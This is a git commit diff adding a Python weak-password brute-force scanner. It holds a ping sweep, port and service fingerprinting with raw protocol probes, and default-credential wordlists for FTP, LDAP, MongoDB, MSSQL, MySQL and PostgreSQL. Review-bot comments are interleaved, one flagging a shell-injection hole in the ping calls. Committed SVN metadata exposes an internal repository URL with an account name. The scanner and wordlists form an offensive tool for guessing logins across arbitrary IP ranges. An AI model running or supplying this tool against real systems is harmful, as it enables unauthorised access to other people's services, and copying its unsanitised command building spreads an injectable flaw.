暴力破解

暴力破解小脚本
pull/4/head
InfoSec 2018-04-03 01:39:21 +08:00
parent 8ea2f263d2
commit ec86a1a1e3
77 changed files with 3582 additions and 0 deletions

23
Bruteforce/README.md Normal file

@ -0,0 +1,23 @@
# bruteforce weak password
# ports&*weak password scanner.
$ python bruteforce.py -h
usage: main.py [-h] [--ip IP] [--threads THREADS] [--P ISPING]
[--p USER_PORTS] [--file FILE]
optional arguments:
-h, --help show this help message and exit
--ip IP ip like 192.168.1.0/24 or 192.168.0.0/16
--threads THREADS Maximum threads, default 50
--P ISPING --P not mean no ping frist,default yes
--p USER_PORTS --p scan ports;like 21,80,445 or 22-1000
--file FILE get ips or domains for this file

53
Bruteforce/bruteforce.py Normal file

@ -0,0 +1,53 @@
#coding=utf-8
__author__ = 'unkonwn'
import argparse
from comm.printers import printPink,printRed,printGreen
from comm.config import *
from comm.portscan import *
from factorys.pluginFactory import *
#实例化config类
c=config()
if __name__ == '__main__':
#接受cmd参数
parser = argparse.ArgumentParser(description='ports&*weak password scanner. teams:xdsec. author: wilson ')
parser.add_argument('--ip',action="store",required=False,dest="ip",type=str,help='ip like 192.168.1.0/24 or 192.168.0.0/16')
parser.add_argument("--threads",action="store",required=False,dest="threads",type=int,default=50,help='Maximum threads, default 50')
parser.add_argument("--P",action="store",required=False,dest="isping",type=str,default='yes',help='--P not mean no ping frist,default yes')
parser.add_argument("--p",action="store",required=False,dest="user_ports",type=str,default='',help='--p scan ports;like 21,80,445 or 22-1000')
parser.add_argument("--file",action="store",required=False,dest="file",type=str,help='get ips or domains for this file')
args = parser.parse_args()
ip = args.ip
filename=args.file
#获取ip列表
if ip:
ips=c.getips(ip)
file="result/%s.txt" %args.ip.replace("/","")
elif filename:
ips=c.file2list(filename)
filename=filename.split("/")[-1]
file="result/%s.txt" %filename
else:
print "error args";exit()
isping=args.isping
user_posts=args.user_ports
threads=args.threads
p=portscan(c,user_posts)
p.run(isping,threads,ips,file)
#print p.ipdict,p.pinglist
plugins=pluginFactory(c)
for pluginname in plugins.pluginList:
#print pluginname
if pluginname:
pluginname.run(p.ipdict,p.pinglist,threads,file)
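Review bot: The `--ip`/`--file` fallback on the line `print "error args";exit()` relies on the `site`-injected `exit` builtin and bypasses argparse's own error path; `parser.error("one of --ip or --file is required")` prints the usage text and exits with status 2, which is what the README's usage block leads a user to expect. The output path built on the `file=` lines assumes a `result/` directory already exists — `config.write_file` opens it with `'a+'` and raises IOError otherwise — so create it up front (`import os` plus an `os.path.isdir`-guarded `os.makedirs("result")`) before the scan starts. Also `file` shadows a builtin and `user_posts` is a typo for `user_ports`, both of which read as noise on review.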


Binary file not shown.

45
Bruteforce/comm/config.py Normal file

@ -0,0 +1,45 @@
#coding=utf-8
__author__ = 'wilson'
from IPy import IP
from comm.printers import printPink,printRed,printGreen
class config(object):
def getips(self,ip):
iplist=[]
try:
if "-" in ip.split(".")[3]:
startnum=int(ip.split(".")[3].split("-")[0])
endnum=int(ip.split(".")[3].split("-")[1])
for i in range(startnum,endnum):
iplist.append("%s.%s.%s.%s" %(ip.split(".")[0],ip.split(".")[1],ip.split(".")[2],i))
else:
ips=IP(ip)
for i in ips:
iplist.append(str(i))
return iplist
except:
printRed("[!] not a valid ip given. you should put ip like 192.168.1.0/24, 192.168.0.0/16,192.168.0.1-200")
exit()
def file2list(self,file):
iplist=[]
try:
fh = open(file)
for ip in fh.readlines():
ip=ip.strip()
iplist.append(ip)
fh.close()
return iplist
except Exception, e:
print e
exit()
def write_file(self,file,contents):
f2 = open(file,'a+')
f2.write(contents)
f2.close()
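Review bot: `getips` and `file2list` terminate the process from inside a library class — the bare `except:` in `getips` also swallows `KeyboardInterrupt` and `SystemExit` — so callers such as `pluginFactory` cannot recover or report; raise `ValueError` (or re-raise) and let the entry point decide whether to exit. `file2list` and `write_file` open files without a `with` block, so an exception inside the read loop leaks the handle; `with open(file) as fh: return [line.strip() for line in fh]` covers both the close and the strip, and `with open(file, 'a+') as f2: f2.write(contents)` does the same for the writer. Printing the exception with `print e` and exiting also discards the traceback, which is the one thing a user needs when a wordlist or target file is missing.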

BIN
Bruteforce/comm/config.pyc Normal file

Binary file not shown.

294
Bruteforce/comm/portscan.py Normal file

@ -0,0 +1,294 @@
#coding=utf-8
__author__ = 'wilson'
import sys
sys.path.append("../")
from comm.config import *
from comm.printers import printPink,printRed,printGreen
import threading
from threading import Thread
from Queue import Queue
import platform
from subprocess import Popen, PIPE
import re
import time
import socket
socket.setdefaulttimeout(10) #设置了全局默认超时时间
class portscan():
"""docstring for ClassName"""
def __init__(self,c,user_ports):
self.config=c
self.PROBES =[
'\r\n\r\n',
'GET / HTTP/1.0\r\n\r\n',
'GET / \r\n\r\n',
'\x01\x00\x00\x00\x01\x00\x00\x00\x08\x08',
'\x80\0\0\x28\x72\xFE\x1D\x13\0\0\0\0\0\0\0\x02\0\x01\x86\xA0\0\x01\x97\x7C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
'\x03\0\0\x0b\x06\xe0\0\0\0\0\0',
'\0\0\0\xa4\xff\x53\x4d\x42\x72\0\0\0\0\x08\x01\x40\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x40\x06\0\0\x01\0\0\x81\0\x02PC NETWORK PROGRAM 1.0\0\x02MICROSOFT NETWORKS 1.03\0\x02MICROSOFT NETWORKS 3.0\0\x02LANMAN1.0\0\x02LM1.2X002\0\x02Samba\0\x02NT LANMAN 1.0\0\x02NT LM 0.12\0',
'\x80\x9e\x01\x03\x01\x00u\x00\x00\x00 \x00\x00f\x00\x00e\x00\x00d\x00\x00c\x00\x00b\x00\x00:\x00\x009\x00\x008\x00\x005\x00\x004\x00\x003\x00\x002\x00\x00/\x00\x00\x1b\x00\x00\x1a\x00\x00\x19\x00\x00\x18\x00\x00\x17\x00\x00\x16\x00\x00\x15\x00\x00\x14\x00\x00\x13\x00\x00\x12\x00\x00\x11\x00\x00\n\x00\x00\t\x00\x00\x08\x00\x00\x06\x00\x00\x05\x00\x00\x04\x00\x00\x03\x07\x00\xc0\x06\x00@\x04\x00\x80\x03\x00\x80\x02\x00\x80\x01\x00\x80\x00\x00\x02\x00\x00\x01\xe4i<+\xf6\xd6\x9b\xbb\xd3\x81\x9f\xbf\x15\xc1@\xa5o\x14,M \xc4\xc7\xe0\xb6\xb0\xb2\x1f\xf9)\xe8\x98',
'\x16\x03\0\0S\x01\0\0O\x03\0?G\xd7\xf7\xba,\xee\xea\xb2`~\xf3\0\xfd\x82{\xb9\xd5\x96\xc8w\x9b\xe6\xc4\xdb<=\xdbo\xef\x10n\0\0(\0\x16\0\x13\0\x0a\0f\0\x05\0\x04\0e\0d\0c\0b\0a\0`\0\x15\0\x12\0\x09\0\x14\0\x11\0\x08\0\x06\0\x03\x01\0',
'< NTP/1.2 >\n',
'< NTP/1.1 >\n',
'< NTP/1.0 >\n',
'\0Z\0\0\x01\0\0\0\x016\x01,\0\0\x08\0\x7F\xFF\x7F\x08\0\0\0\x01\0 \0:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\04\xE6\0\0\0\x01\0\0\0\0\0\0\0\0(CONNECT_DATA=(COMMAND=version))',
'\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x01\x55\x00\x00\x00\x4d\x53\x53\x51\x4c\x53\x65\x72\x76\x65\x72\x00\x48\x0f\x00\x00',
'\0\0\0\0\x44\x42\x32\x44\x41\x53\x20\x20\x20\x20\x20\x20\x01\x04\0\0\0\x10\x39\x7a\0\x01\0\0\0\0\0\0\0\0\0\0\x01\x0c\0\0\0\0\0\0\x0c\0\0\0\x0c\0\0\0\x04',
'\x01\xc2\0\0\0\x04\0\0\xb6\x01\0\0\x53\x51\x4c\x44\x42\x32\x52\x41\0\x01\0\0\x04\x01\x01\0\x05\0\x1d\0\x88\0\0\0\x01\0\0\x80\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x08\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x01\0\0\x40\0\0\0\x40\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x02\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\0\0\0\0\x01\0\0\x40\0\0\0\0\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x04\0\0\0\x03\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x08\0\0\0\x01\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x10\0\0\0\x01\0\0\x80\0\0\0\x01\x10\0\0\0\x01\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x80\0\0\0\x01\x04\0\0\0\x03\0\0\x80\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\x01\x04\0\0\x01\0\0\x80\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\x40\0\0\0\x01\0\0\0\0\x01\0\0\x40\0\0\0\0\x20\x20\x20\x20\x20\x20\x20\x20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xe4\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x7f',
'\x41\0\0\0\x3a\x30\0\0\xff\xff\xff\xff\xd4\x07\0\0\0\0\0\0test.$cmd\0\0\0\0\0\xff\xff\xff\xff\x1b\0\0\0\x01serverStatus\0\0\0\0\0\0\0\xf0\x3f\0'
]
self.SIGNS =self.config.file2list("conf/signs.conf")
self.ports=[]
self.getports(user_ports)
self.lock = threading.Lock()
self.pinglist=[]
self.q=Queue()
self.sp=Queue()
self.signs=self.prepsigns()
self.ipdict={}
self.ipdict['ldap']=[]
self.ipdict['mysql']=[]
self.ipdict['mssql']=[]
self.ipdict['ftp']=[]
self.ipdict['ssh']=[]
self.ipdict['smb']=[]
self.ipdict['vnc']=[]
self.ipdict['pop3']=[]
self.ipdict['rsync']=[]
self.ipdict['http']=[]
self.ipdict['https']=[]
self.ipdict['mongodb']=[]
self.ipdict['postgres']=[]
self.ipdict['redis']=[]
self.ipdict['ssl']=[]
self.ipdict['Unknown']=[]
#获取扫描端口列表
def getports(self,user_ports):
if user_ports=='':
self.ports=[21,22,23,80,81,443,389,445,843,873,1043,1099,1194,1433,1434,1521,2601,2604,3306,3307,3128,3389,3812,4440,4848,5432,5900,5901,5902,5903,6082,6000,6379,7001,7002,8080,8181,8888,8090,8000,8008,8009,8081,8088,8089,9000,9080,9043,9090,9091,9200,9528,10000,11211,10022,15000,16000,22022,22222,27017,28017,17017,18017,11321,50060]
else:
try:
if user_ports.find(",")>0:
for port in user_ports.split(','):
self.ports.append(int(port))
elif user_ports.find("-")>0:
startport=int(user_ports.split('-')[0])
endport=int(user_ports.split('-')[1])
for i in xrange(startport,endport+1):
self.ports.append(i)
else:
self.ports.append(int(user_ports))
except :
printRed('[!] not a valid ports given. you should put ip like 22,80,1433 or 22-1000')
exit()
#ping扫描函数
def pinger(self):
while True:
ip=self.q.get()
if platform.system()=='Linux':
p=Popen(['ping','-c 2',ip],stdout=PIPE)
m = re.search('(\d)\sreceived', p.stdout.read())
try:
if m.group(1)!='0':
self.pinglist.append(ip)
self.lock.acquire()
printRed("%s is live!!\r\n" % ip)
self.lock.release()
except:pass
if platform.system()=='Darwin':
import commands
p=commands.getstatusoutput("ping -c 2 "+ip)
m = re.findall('ttl', p[1])
try:
if m:
self.pinglist.append(ip)
self.lock.acquire()
printRed("%s is live!!\r\n" % ip)
self.lock.release()
except:pass
if platform.system()=='Windows':
p=Popen('ping -n 2 ' + ip, stdout=PIPE)
m = re.findall('TTL', p.stdout.read())
if m:
self.pinglist.append(ip)
self.lock.acquire()
printRed("%s is live!!\r\n" % ip)
self.lock.release()
self.q.task_done()
def pingscan(self,isping,threads,ips):
starttime=time.time()
friststarttime=time.time()
print "[*] start Scanning at %s" % time.ctime()
#isping=='no' 就禁ping扫描
#默认ping 扫描
if isping=='yes':
print "Scanning for live machines..."
for i in xrange(threads):
t = Thread(target=self.pinger)
t.setDaemon(True)
t.start()
for ip in ips:
self.q.put(ip)
self.q.join()
else:
self.pinglist=ips
if len(self.pinglist)==0:
print "not find any live machine - -|||"
exit()
print "[*] Scanning for live machines done,it has Elapsed time:%s " % (time.time()-starttime)
def prepsigns(self):
signlist=[]
for item in self.SIGNS:
(label,pattern)=item.split('|',2)
sign=(label,pattern)
signlist.append(sign)
return signlist
def matchbanner(self,banner,slist):
#print banner
for item in slist:
p=re.compile(item[1])
#print item[1]
if p.search(banner)!=None:
return item[0]
return 'Unknown'
#扫端口及其对应服务类型函数
def scanports(self):
while True:
ip,port=self.sp.get()
#print ip,port
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#判断端口的服务类型
service='Unknown'
try:
s.connect((ip,port))
except:
self.sp.task_done()
continue
try:
result = s.recv(256)
service=self.matchbanner(result,self.signs)
except:
for probe in self.PROBES:
#print probe
try:
s.close()
sd=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sd.settimeout(5)
sd.connect((ip,port))
sd.send(probe)
except:
continue
try:
result=sd.recv(256)
service=self.matchbanner(result,self.signs)
if service!='Unknown':
break
except:
continue
if service not in self.ipdict:
self.ipdict[service]=[]
self.ipdict[service].append(ip+':'+str(port))
self.lock.acquire()
printRed("%s opening %s\r\n" %(ip,port))
self.lock.release()
else:
self.ipdict[service].append(ip+':'+str(port))
self.lock.acquire()
printRed("%s opening %s\r\n" %(ip,port))
self.lock.release()
self.sp.task_done()
def portsscan(self,threads,file):
print "Scanning ports now..."
print "[*] start Scanning live machines' ports at %s" % time.ctime()
starttime=time.time()
for i in xrange(threads):
st=Thread(target=self.scanports)
st.setDaemon(True)
st.start()
for scanip in self.pinglist:
for port in self.ports:
self.sp.put((scanip,port))
self.sp.join()
print "[*] Scanning ports done,it has Elapsed time:%s " % (time.time()-starttime)
#将服务端口 信息 记录文件
for name in self.ipdict.keys():
if len(self.ipdict[name]):
contents=str(name)+' service has:\n'+' '+str(self.ipdict[name])+'\n'
self.config.write_file(contents=contents,file=file)
#处理没有识别的服务
def handleunknown(self):
for ip in self.ipdict['Unknown']:
#print ip
try:
if str(ip).split(':')[1]=='389':
self.ipdict['ldap'].append(ip)
if str(ip).split(':')[1]=='445':
self.ipdict['smb'].append(ip)
if str(ip).split(':')[1] in ['3306','3307','3308','3309']:
self.ipdict['mysql'].append(ip)
if str(ip).split(':')[1]=='1433':
self.ipdict['mssql'].append(ip)
if str(ip).split(':')[1] in ['10022','22']:
self.ipdict['ssh'].append(ip)
if str(ip).split(':')[1]=='27017':
self.ipdict['mongodb'].append(ip)
if str(ip).split(':')[1]=='110':
self.ipdict['pop3'].append(ip)
if str(ip).split(':')[1]=='5432':
self.ipdict['postgres'].append(ip)
if str(ip).split(':')[1]=='443':
self.ipdict['ssl'].append(ip)
if str(ip).split(':')[1]=='873':
self.ipdict['rsync'].append(ip)
if str(ip).split(':')[1]=='6379':
self.ipdict['redis'].append(ip)
# if str(ip).split(':')[1]=='21':
# self.ipdict['ftp'].append(ip)
except Exception as e:
print e
#处理被识别为http的mongo
for ip in self.ipdict['http']:
if str(ip).split(':')[1]=='27017':
self.ipdict['http'].remove(ip)
self.ipdict['mongodb'].append(ip)
def run(self,isping,threads,ips,file):
self.pingscan(isping,threads,ips)
self.portsscan(threads,file)
self.handleunknown()
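Review bot: `pinger` builds the ping command by string concatenation on the Darwin branch (`commands.getstatusoutput("ping -c 2 "+ip)`) and the Windows branch (`Popen('ping -n 2 ' + ip, stdout=PIPE)`); `ip` arrives unvalidated from a user-supplied `--file` line via `config.file2list` and `pingscan`, so a crafted line is executed by the shell on Darwin and reaches `ping` as arbitrary extra arguments on Windows. Use the argv-list form on every platform, e.g. `Popen(['ping', '-c', '2', ip], stdout=PIPE)`, and validate each entry (`socket.inet_aton` or `IP(ip)`) before it is queued; the Linux branch's single `'-c 2'` token only works because ping tolerates the joined option and should become two elements as well. Separately, the last loop in `handleunknown` calls `self.ipdict['http'].remove(ip)` while iterating that same list, which skips the element following each match; iterate over `list(self.ipdict['http'])` or filter into a new list. `matchbanner` also recompiles every signature regex on each call, which `prepsigns` could do once by storing `re.compile(pattern)` instead of the raw string.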

Binary file not shown.


@ -0,0 +1,78 @@
import ctypes,sys
import platform
if platform.system()=='Linux' or platform.system()=='Darwin':
class colors:
BLACK = '\033[0;30m'
DARK_GRAY = '\033[1;30m'
LIGHT_GRAY = '\033[0;37m'
BLUE = '\033[0;34m'
LIGHT_BLUE = '\033[1;34m'
GREEN = '\033[0;32m'
LIGHT_GREEN = '\033[1;32m'
CYAN = '\033[0;36m'
LIGHT_CYAN = '\033[1;36m'
RED = '\033[0;31m'
LIGHT_RED = '\033[1;31m'
PURPLE = '\033[0;35m'
LIGHT_PURPLE = '\033[1;35m'
BROWN = '\033[0;33m'
YELLOW = '\033[1;33m'
WHITE = '\033[1;37m'
DEFAULT_COLOR = '\033[00m'
RED_BOLD = '\033[01;31m'
ENDC = '\033[0m'
def printRed(mess):
mess=mess.strip('\r\n')
print colors.RED + mess + colors.ENDC
def printPink(mess):
mess=mess.strip('\r\n')
print colors.BLUE + mess+ colors.ENDC
def printGreen(mess):
mess=mess.strip('\r\n')
print colors.GREEN + mess + colors.ENDC
if platform.system()=='Windows':
STD_INPUT_HANDLE = -10
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
FOREGROUND_BLACK = 0x0
FOREGROUND_BLUE = 0x01 # text color contains blue.
FOREGROUND_GREEN = 0x02 # text color contains green.
FOREGROUND_RED = 0x04 # text color contains red.
FOREGROUND_INTENSITY = 0x08 # text color is intensified.
BACKGROUND_BLUE = 0x10 # background color contains blue.
BACKGROUND_GREEN = 0x20 # background color contains green.
BACKGROUND_RED = 0x40 # background color contains red.
BACKGROUND_INTENSITY = 0x80 # background color is intensified.
std_out_handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
def set_cmd_text_color(color, handle=std_out_handle):
Bool = ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color)
return Bool
def resetColor():
set_cmd_text_color(FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE)
def printRed(mess):
set_cmd_text_color(FOREGROUND_RED | FOREGROUND_INTENSITY)
sys.stdout.write(mess)
resetColor()
def printPink(mess):
set_cmd_text_color(FOREGROUND_RED | FOREGROUND_BLUE| FOREGROUND_INTENSITY)
print(mess)
resetColor()
def printGreen(mess):
set_cmd_text_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY)
sys.stdout.write(mess)
resetColor()
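Review bot: In the Windows branch `printPink` emits with `print(mess)` while its siblings `printRed` and `printGreen` use `sys.stdout.write(mess)`, so the same message gets a trailing newline from one helper and not the others, and the `\r\n` stripping done by the POSIX versions is absent from all three; align them on one form, e.g. `sys.stdout.write(mess.strip('\r\n') + '\n')`. The POSIX definitions live inside `if platform.system()=='Linux' or ...`, so on any other `platform.system()` value none of `printRed`/`printPink`/`printGreen` exists and the first call raises `NameError`; a plain-text `else:` fallback keeps callers working. `set_cmd_text_color` ignores the return value of `SetConsoleTextAttribute` apart from returning it, so a failed attribute change leaves later output in the wrong colour silently.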

Binary file not shown.

BIN
Bruteforce/conf/.DS_Store vendored Normal file

Binary file not shown.


@ -0,0 +1,11 @@
K 25
svn:wc:ra_dav:version-url
V 43
/svn/asoc/!svn/ver/2793/trunk/portScan/conf
END
config.txt
K 25
svn:wc:ra_dav:version-url
V 54
/svn/asoc/!svn/ver/2793/trunk/portScan/conf/config.txt
END


@ -0,0 +1,62 @@
10
dir
3928
http://weisen.cws@sources.alipay.net/svn/asoc/trunk/portScan/conf
http://weisen.cws@sources.alipay.net/svn/asoc
2014-12-16T07:44:40.829054Z
2793
pengliu.lp
4b2b8d61-1d8c-441e-9e62-9f354fa0bc87
config.txt
file
2015-08-28T10:59:17.000000Z
fedd5f2201b8a8c4cb5eb448e116d05b
2014-12-16T07:44:40.829054Z
2793
pengliu.lp
72
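Review bot: Subversion working-copy metadata should not be committed: this `entries` file (and the `all-wcprops` file in the previous hunk) records an internal repository URL with an embedded account name plus the committing user id and a file checksum, leaking infrastructure detail for no benefit to the Git tree. Remove both files and add `.svn/` to `.gitignore`; the same hygiene applies to the `.DS_Store` and `.pyc` files added elsewhere in this commit, which are build and desktop artefacts rather than source.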


@ -0,0 +1,7 @@
<task>
[global]
task_type = 1
<log>
[global]
logfile = ./log/log.txt

72
Bruteforce/conf/ftp.conf Normal file

@ -0,0 +1,72 @@
ftp:ftp@163.com
ftp:ftp
ftp:1
ftp:12
ftp:123
ftp:1234
ftp:12345
ftp:123456
ftp:1234567
ftp:12345678
ftp:123456789
ftp:1234567890
ftp:654321
ftp:54321
ftp:00000000
ftp:88888888
ftp:pass
ftp:password
ftp:passwd
ftp:!@#$%^
ftp:1q2w3e
ftp:qawsed
ftp:pwd
ftp:1qaz2ws3e4
ftp:qazwsxedc
ftp:!@#$%^&*
ftp:ftp21
ftp:ftppass
ftp:ftp221
ftp:ftppassword
ftp:ftppasswd
admin:1
admin:12
admin:admin
admin:123
admin:1234
admin:12345
admin:123456
admin:1234567
admin:12345678
admin:123456789
admin:1234567890
admin:654321
admin:54321
admin:00000000
admin:88888888
admin:pass
admin:password
admin:passwd
admin:!@#$%^
admin:1q2w3e
admin:qawsed
admin:pwd
admin:1qaz2ws3e4
admin:qazwsxedc
admin:!@#$%^&*
admin:rootpass
admin:rootpassword
admin:rootpasswd
test:1
test:12
test:123
test:1234
test:12345
test:123456
test:1234567
test:12345678
test:123123
test:123456789
test:test
test:654321
test:54321


@ -0,0 +1,27 @@
Anonymous:
Manager:123456
Manager:secret
Manager:1
Manager:12
Manager:123
Manager:1234
Manager:12345
Manager:123456
Manager:1234567
Manager:12345678
Manager:123456789
Manager:1234567890
Manager:654321
Manager:54321
Manager:00000000
Manager:88888888
Manager:pass
Manager:password
Manager:passwd
Manager:!@#$%^
Manager:1q2w3e
Manager:qawsed
Manager:pwd
Manager:1qaz2ws3e4
Manager:qazwsxedc
Manager:!@#$%^&*


@ -0,0 +1,115 @@
anonymous:
mongodb:1
mongodb:12
mongodb:123
mongodb:1234
mongodb:12345
mongodb:123456
mongodb:1234567
mongodb:12345678
mongodb:123456789
mongodb:1234567890
mongodb:654321
mongodb:54321
mongodb:mongodb
mongodb:00000000
mongodb:88888888
mongodb:pass
mongodb:password
mongodb:passwd
mongodb:!@#$%^
mongodb:1q2w3e
mongodb:qawsed
mongodb:pwd
mongodb:1qaz2ws3e4
mongodb:qazwsxedc
mongodb:!@#$%^&*
mongodb:rootpass
mongodb:rootpassword
mongodb:rootpasswd
root:1
root:12
root:root
root:root123
root:root123456
root:123
root:1234
root:12345
root:123456
root:1234567
root:12345678
root:123456789
root:1234567890
root:654321
root:54321
root:00000000
root:88888888
root:pass
root:password
root:passwd
root:!@#$%^
root:1q2w3e
root:qawsed
root:pwd
root:test
root:qwe123
root:1qaz2ws3e4
root:qazwsxedc
root:!@#$%^&*
root:root123
root:root123456
root:rootpass
root:rootpassword
root:rootpasswd
root:admin
root:admin123
root:-
root:_
root:1qaz2wsx
root:666666
root:888888
root:123123
root:toor
root:123abc
root:passw0rd
admin:1
admin:12
admin:admin
admin:123
admin:1234
admin:12345
admin:123456
admin:1234567
admin:12345678
admin:123456789
admin:1234567890
admin:654321
admin:54321
admin:00000000
admin:88888888
admin:pass
admin:password
admin:passwd
admin:!@#$%^
admin:1q2w3e
admin:qawsed
admin:pwd
admin:1qaz2ws3e4
admin:qazwsxedc
admin:!@#$%^&*
admin:rootpass
admin:rootpassword
admin:rootpasswd
test:1
test:12
test:123
test:1234
test:12345
test:123456
test:1234567
test:123123
test:12345678
test:123456789
test:test
test:654321
test:54321


@ -0,0 +1,33 @@
sa:1
sa:
sa:sa
sa:sa123
sa:12
sa:123
sa:1234
sa:12345
sa:123456
sa:1234567
sa:12345678
sa:123456789
sa:1234567890
sa:654321
sa:54321
sa:00000000
sa:88888888
sa:pass
sa:password
sa:passwd
sa:!@#$%^
sa:1q2w3e
sa:qawsed
sa:pwd
sa:1qaz2ws3e4
sa:qazwsxedc
sa:!@#$%^&*
sa:sa1433
sa:sapass
sa:sa1434
sa:sapassword
sa:sapasswd
sa:aS6kR9auNM


@ -0,0 +1,75 @@
root:1
root:12
root:123
root:1234
root:12345
root:123456
root:1234567
root:12345678
root:123456789
root:1234567890
root:654321
root:54321
root:00000000
root:88888888
root:
root:root
root:root123
root:root123456
root:pass
root:password
root:passwd
root:!@#$%^
root:1q2w3e
root:qawsed
root:pwd
root:1qaz2ws3e4
root:qazwsxedc
root:!@#$%^&*
root:root3306
root:rootpass
root:root3307
root:rootpassword
root:rootpasswd
mysql:1
mysql:12
mysql:123
mysql:1234
mysql:12345
mysql:123456
mysql:1234567
mysql:12345678
mysql:123456789
mysql:1234567890
mysql:654321
mysql:54321
mysql:00000000
mysql:mysql
mysql:88888888
mysql:pass
mysql:password
mysql:passwd
mysql:!@#$%^
mysql:1q2w3e
mysql:qawsed
mysql:pwd
mysql:1qaz2ws3e4
mysql:qazwsxedc
mysql:!@#$%^&*
mysql:root3306
mysql:rootpass
mysql:root3307
mysql:rootpassword
mysql:rootpasswd
test:1
test:123123
test:12
test:123
test:1234
test:12345
test:123456
test:1234567
test:12345678
test:123456789
test:test
test:654321



@ -0,0 +1,64 @@
root:1
root:12
root:123
root:x90x00
root:1234
root:12345
root:123456
root:1234567
root:12345678
root:123456789
root:1234567890
root:654321
root:54321
root:00000000
root:88888888
root:root
root:root123
root:root123456
root:pass
root:motianlun
root:mofashi
root:password
root:passwd
root:!@#$%^
root:1q2w3e
root:qawsed
root:pwd
root:1qaz2ws3e4
root:qazwsxedc
root:!@#$%^&*
root:root3306
root:rootpass
root:root3307
root:rootpassword
root:rootpasswd
postgres:1
postgres:12
postgres:123
postgres:1234
postgres:12345
postgres:123456
postgres:1234567
postgres:12345678
postgres:123456789
postgres:1234567890
postgres:postgres
postgres:654321
postgres:54321
postgres:88888888
postgres:pass
postgres:password
postgres:passwd
postgres:!@#$%^
postgres:1q2w3e
postgres:qawsed
postgres:pwd
postgres:1qaz2ws3e4
postgres:qazwsxedc
postgres:!@#$%^&*
postgres:postgres654321
postgres:postgres123456
postgres:postgres123
postgres:postgrespassword
postgres:postgrespasswd


@ -0,0 +1,80 @@
http|^HTTP.*
http|^HTTP/0.
http|^HTTP/1.
http|<HEAD>.*<BODY>
http|<HTML>.*
http|<html>.*
http|<!DOCTYPE.*
http|^Invalid requested URL
http|.*<?xml
http|^HTTP/.*\nServer: Apache/1
http|^HTTP/.*\nServer: Apache/2
http|.*Microsoft-IIS.*
http|^HTTP/.*\nServer: Microsoft-IIS
http|^HTTP/.*Cookie.*ASPSESSIONID
http|^<h1>Bad Request .Invalid URL.</h1>
redis|ERR unknown command
redis|ERR wrong number of arguments
mongodb|^.*version.....([\.\d]+)
pop3|.*POP3.*
pop3|.*pop3.*
ssh|SSH-2.0-OpenSSH.*
ssh|SSH-1.0-OpenSSH.*
ssh|.*ssh.*
backdoor-fxsvc|^500 Not Loged in
backdoor-shell|GET: command
backdoor-shell|sh: GET:
bachdoor-shell|[a-z]*sh: .* command not found
backdoor-shell|^bash[$#]
backdoor-shell|^sh[$#]
backdoor-cmdshell|^Microsoft Windows .* Copyright .*>
ftp|^220.*\n331
ftp|^220.*\n530
ftp|^220.*FTP
ftp|^220 .* Microsoft .* FTP
ftp|^220 Inactivity timer
ftp|^220 .* UserGate
ftp|^220(.*?)
ldap|^\x30\x0c\x02\x01\x01\x61
ldap|^\x30\x32\x02\x01
ldap|^\x30\x33\x02\x01
ldap|^\x30\x38\x02\x01
ldap|^\x30\x84
ldap|^\x30\x45
ldap|^\x30.*
smb|^\0\0\0.\xffSMBr\0\0\0\0.*
mssql|^\x04\x01\0C..\0\0\xaa\0\0\0/\x0f\xa2\x01\x0e.*
mssql|^\x05\x6e\x00
mssql|^\x04\x01\x00\x25\x00\x00\x01\x00\x00\x00\x15.*
mssql|^\x04\x01\x00.\x00\x00\x01\x00\x00\x00\x15.*
mssql|^\x04\x01\x00\x25\x00\x00\x01\x00\x00\x00\x15.*
mssql|^\x04\x01\x00.\x00\x00\x01\x00\x00\x00\x15.*
mssql|^\x04\x01\0\x25\0\0\x01\0\0\0\x15\0\x06\x01.*
mssql|^\x04\x01\x00\x25\x00\x00\x01.*
mysql|^\x19\x00\x00\x00\x0a
mysql|^\x2c\x00\x00\x00\x0a
mysql|hhost \'
mysql|khost \'
mysql|mysqladmin
mysql|(.*)5(.*)log
mysql|(.*)4(.*)log
mysql|whost \'
mysql|^\(\x00\x00
mysql|this MySQL
mysql|^N\x00
mysql|(.*)mysql(.*)
mssql|;MSSQLSERVER;
oracle|\(ERROR_STACK=\(ERROR=\(CODE=
oracle|\(ADDRESS=\(PROTOCOL=
postgres|Invalid packet length
postgres|^EFATAL
rsync|^@RSYNCD:.*
snmp|\x70\x75\x62\x6c\x69\x63\xa2
snmp|\x41\x01\x02
ssh|^SSH-
ssh|^SSH-.*openssh
telnet|^\xff\xfd
